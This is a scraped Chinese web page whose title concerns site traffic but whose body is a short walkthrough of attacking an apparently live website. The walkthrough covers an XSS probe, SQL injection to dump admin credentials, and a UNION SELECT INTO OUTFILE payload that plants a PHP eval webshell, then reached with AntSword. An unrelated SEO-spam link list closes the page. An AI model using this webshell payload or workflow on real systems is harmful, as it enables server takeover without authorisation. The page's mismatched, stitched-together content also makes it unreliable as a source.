当前位置: 首页 > news >正文

网站增加流量自己建网站怎么弄

网站增加流量,自己建网站怎么弄,微信小程序开发用什么语言?,网站如何重新备案1.xss漏洞 搜索框输入以下代码&#xff0c;验证是否存在xss漏洞 <script>alert(1)</script> OK了&#xff0c;存在xss漏洞 2.SQL注入 经过测试&#xff0c;输入框存在SQL注入漏洞 查询数据库名 查询管理员账号密码 此处密码为MD5加密&#xff0c;解码内容如下 找…

1.xss漏洞

搜索框输入以下代码,验证是否存在xss漏洞

<script>alert(1)</script>

OK了,存在xss漏洞

2.SQL注入

经过测试,输入框存在SQL注入漏洞

查询数据库名

查询管理员账号密码

 此处密码为MD5加密,解码内容如下

找了半天,没有找到管理员登录界面,所以找到管理员账号和密码没有用,虽然没有,但是证明了一点,那就是此处可以无限制输入命令,并执行,通过扫描目录发现存在phpinfo文件,访问得知网站绝对路径

于是乎,尝试使用sql注入的方式,上传一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/www.php' #

根据设定的地址访问上传的文件 

写入成功,蚁剑连接大脑,cmd代替思考

完事🧐

http://www.ritt.cn/news/20547.html

相关文章:

  • 房地产销售述职报告放心网站推广优化咨询
  • 哈尔滨建设局网站太原网站优化
  • 禹城有做网站2023年8月新冠疫情
  • 外行学网页制作与网站建设从入门到精通seo软件推荐
  • 宁波网页设计培训班优化营商环境工作开展情况汇报
  • 中国最大网站建设商淄博头条新闻今天
  • seo的网站特征如何在百度上发表文章
  • 淮安建设网站制作世界军事新闻
  • 网站离线浏览器 怎么做建网站流程
  • 网站流量一直做不起来企业营销培训课程
  • WordPress支持外链图片seo数据分析哪些方面
  • 网站地图对seo的影响搜索引擎优化的简写是
  • 最专业的网站建设公司代理公司注册
  • win2008r做网站临沂百度推广多少钱
  • 网站icp备案证书下载恶意点击推广神器
  • 福州免费自助建站模板南昌百度推广联系方式
  • 网页设计代码html作品展示西安网站seo哪家公司好
  • google网站登陆模板腾讯体育nba
  • 网站开发工程师职位概要爱站关键词
  • 网站建设优化过程中的优化策略seo研究中心怎么了
  • 网站下载下来怎么做后台在百度上怎么发布信息
  • 为什么很多公司做网站建设营销计划书7个步骤
  • 网站建设维护人员友情链接赚钱
  • wordpress 4.9.8中文版西安seo经理
  • 做侵权网站用哪里的服务器稳搜索引擎技术基础
  • 贵州省建设学校官方网站广州优化公司哪家好
  • 安徽网站建设公司排名游戏推广员每天做什么
  • 营销型网站服务网络营销的三大核心
  • 典型网站开发的流程重庆高端seo
  • 做企业公示的数字证书网站百度软件下载